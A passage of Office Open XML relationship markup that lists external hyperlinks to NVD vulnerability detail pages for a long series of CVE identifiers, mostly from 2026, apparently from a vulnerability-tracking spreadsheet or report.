TargetMode="External" Id="rId3301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85654" TargetMode="External" Id="rId3302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85669" TargetMode="External" Id="rId3303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85689" TargetMode="External" Id="rId3304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85692" TargetMode="External" Id="rId3305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85787" TargetMode="External" Id="rId3306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId3307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" Id="rId3308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86091" TargetMode="External" Id="rId3309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86097" TargetMode="External" Id="rId3310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86111" TargetMode="External" Id="rId3311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86113" TargetMode="External" Id="rId3312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86116" TargetMode="External" Id="rId3313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86175" TargetMode="External" Id="rId3314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86192" TargetMode="External" Id="rId3315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86204" TargetMode="External" Id="rId3316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86255" TargetMode="External" Id="rId3317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86283" TargetMode="External" Id="rId3318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86347" TargetMode="External" Id="rId3319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86408" TargetMode="External" Id="rId3320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId3321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId3322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId3323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId3324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId3325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId3326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId3327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86757" TargetMode="External" Id="rId3328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86758" TargetMode="External" Id="rId3329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86759" TargetMode="External" Id="rId3330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86764" TargetMode="External" Id="rId3331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86765" TargetMode="External" Id="rId3332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86766" TargetMode="External" Id="rId3333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87072" TargetMode="External" Id="rId3334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87803" TargetMode="External" Id="rId3335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87809" TargetMode="External" Id="rId3336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId3337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87821" TargetMode="External" Id="rId3338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87961" TargetMode="External" Id="rId3339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87998" TargetMode="External" Id="rId3340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId3341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88016" TargetMode="External" Id="rId3342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88021" TargetMode="External" Id="rId3343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88026" TargetMode="External" Id="rId3344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88027" TargetMode="External" Id="rId3345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88028" TargetMode="External" Id="rId3346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88870" TargetMode="External" Id="rId3347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88872" TargetMode="External" Id="rId3348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88873" TargetMode="External" Id="rId3349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88898" TargetMode="External" Id="rId3350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88915" TargetMode="External" Id="rId3351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88938" TargetMode="External" Id="rId3352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89011" TargetMode="External" Id="rId3353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89245" TargetMode="External" Id="rId3354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89251" TargetMode="External" Id="rId3355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89252" TargetMode="External" Id="rId3356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId3357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48564" TargetMode="External" Id="rId3358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15419" TargetMode="External" Id="rId3359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34789" TargetMode="External" Id="rId3360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40506" TargetMode="External" Id="rId3361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48711" TargetMode="External" Id="rId3362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4878" TargetMode="External" Id="rId3363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId3364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52817" TargetMode="External" Id="rId3365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54467" TargetMode="External" Id="rId3366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58230" TargetMode="External" Id="rId3367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId3368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61783" TargetMode="External" Id="rId3369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId3370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId3371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId3372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62727" TargetMode="External" Id="rId3373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63387" TargetMode="External" Id="rId3374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63424" TargetMode="External" Id="rId3375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId3376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId3377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId3378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId3379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId3380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId3381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId3382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId3383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId3384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId3385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId3386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId3387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId3388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId3389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId3390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId3391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId3392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId3393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId3394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId3395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId3396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId3397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId3398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId3399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId3400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId3401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId3402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId3403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId3404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId3405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId3406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId3407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId3408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId3409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId3410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId3411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId3412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId3413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId3414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId3415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId3416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId3417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId3418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId3419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId3420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId3421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId3422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId3423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId3424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId3425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId3426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId3427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId3428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId3429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId3430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId3431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId3432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId3433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId3434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId3435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId3436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId3437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId3438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId3439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId3440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId3441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId3442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId3443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId3444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId3445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId3446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId3447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId3448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId3449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId3450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId3451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId3452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId3453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId3454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId3455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId3456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId3457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId3458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId3459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId3460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId3461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId3462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId3463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId3464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId3465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 